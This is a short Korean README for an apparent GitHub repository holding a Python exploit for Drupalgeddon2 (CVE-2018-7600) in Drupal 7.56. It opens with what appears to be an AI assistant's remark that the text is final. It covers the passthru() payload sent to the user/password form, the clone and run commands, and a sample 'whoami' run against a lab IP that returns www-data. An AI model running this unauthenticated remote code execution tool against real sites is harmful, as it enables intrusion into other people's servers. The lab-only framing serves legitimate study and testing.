
드루팔 7.56 버전에서 RCE를 수행하는 파이썬 프로그램
자, 사용법 부분도 추가했습니다. git clone부터 시작해서 README가 완성됐습니다. 이게 최종 버전이니 GitHub 저장소의 README.md에 그대로 복사해서 붙여넣으세요.
이 익스플로잇은 Drupalgeddon2로 알려진 Drupal 7.56 (및 일부 이전 버전)의 취약점을 이용합니다.
이 취약점은 취약한 폼의 결함을 악용하여 인증 없이 **원격 코드 실행(RCE)**을 가능하게 합니다.
🔗 저장소: https://github.com/xxxTectationxxx/CVE-2018-7600
이 스크립트는 학습 목적 및 랩 환경 테스트를 위해서만 제작되었습니다.
테스트할 공식 허가가 없는 시스템에서 사용하는 것은 금지됩니다.
user/password 엔드포인트에 PHP의 passthru() 함수를 트리거하는 매개변수가 포함된 페이로드를 전송합니다.form_build_id를 추출합니다.저장소 클론:
git clone https://github.com/xxxTectationxxx/CVE-2018-7600.git
cd CVE-2018-7600
의존성 설치:
pip install requests
익스플로잇 실행:
python3 drupalgeddon2.py --URL <target_url> --COMMAND "<command>"
예시:
python3 drupalgeddon2.py --URL http://192.168.60.129 --COMMAND "whoami"
[*] 대상에 초기 페이로드 전송 중...
[+] form_build_id 발견: form-ABC123XYZ
[+] 명령 출력:
www-data
면책 조항: 작성자는 이 스크립트의 오용에 대해 책임을 지지 않습니다. 현명하게 사용하고, 테스트가 허가된 시스템에서만 사용하세요.